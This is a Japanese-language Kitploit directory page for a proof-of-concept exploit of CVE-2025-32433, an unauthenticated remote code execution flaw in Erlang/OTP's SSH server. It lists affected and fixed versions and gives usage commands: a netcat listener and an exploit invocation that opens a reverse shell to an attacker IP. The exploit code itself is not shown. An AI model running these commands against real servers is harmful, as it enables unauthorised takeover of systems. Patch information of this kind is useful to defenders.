Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE — Erlang/OTP SSHサーバーにおける認証なしのリモートコード実行を示すPoC。SSHプロトコルのメッセージ処理の欠陥を悪用することで、攻撃者は有効な認証情報なしにターゲット上で任意のコマンドを実行できます。 | Kitploit
ツール/GitHubGitHub/dollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce
ペイロード生成脆弱性分析エクスプロイトペネトレーションテスト学習と教育リモートアクセスツール
GitHubdollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

Erlang/OTP SSHサーバーにおける認証なしのリモートコード実行を示すPoC。SSHプロトコルのメッセージ処理の欠陥を悪用することで、攻撃者は有効な認証情報なしにターゲット上で任意のコマンドを実行できます。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
311ヶ月前未レビュー

CVE-2025-32433 - Erlang/OTP SSH RCE PoC

CVE-2025-32433

概要

Erlang/OTP SSH サーバーにおける認証不要のリモートコード実行を示す PoC です。
SSH プロトコルのメッセージ処理の欠陥を悪用することで、攻撃者は有効な認証情報なしに対象上で任意のコマンドを実行できます。

  • CVE: CVE-2025-32433
  • CVSS スコア: 10.0 (緊急)
  • 影響を受けるバージョン:
    • OTP-27.3.3 以前
    • OTP-26.2.5.11 以前
    • OTP-25.3.2.20 以前

この問題は OTP-27.3.3、OTP-26.2.5.11、OTP-25.3.2.20 で修正されています。

参照

  • Unit42 アドバイザリ
  • PoC リポジトリ
  • NVD エントリ

使用方法

リスナーの設定:

root@kitploit:~
nc -lvnp 1234

alt text エクスプロイトの実行:

root@kitploit:~
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  • --rhost : 対象 IP
  • --rport : 対象 SSH ポート
  • --lhost : リバースシェル用のあなたの IP
  • --lport : あなたのリスナーポート

alt text

alt text

免責事項

このリポジトリは教育目的のみです。このエクスプロイトを、所有していない、またはテストする明示的な許可を得ていないシステムに対して使用しないでください。誤用は違法となる可能性があり、固く禁止されています。

ツールをダウンロード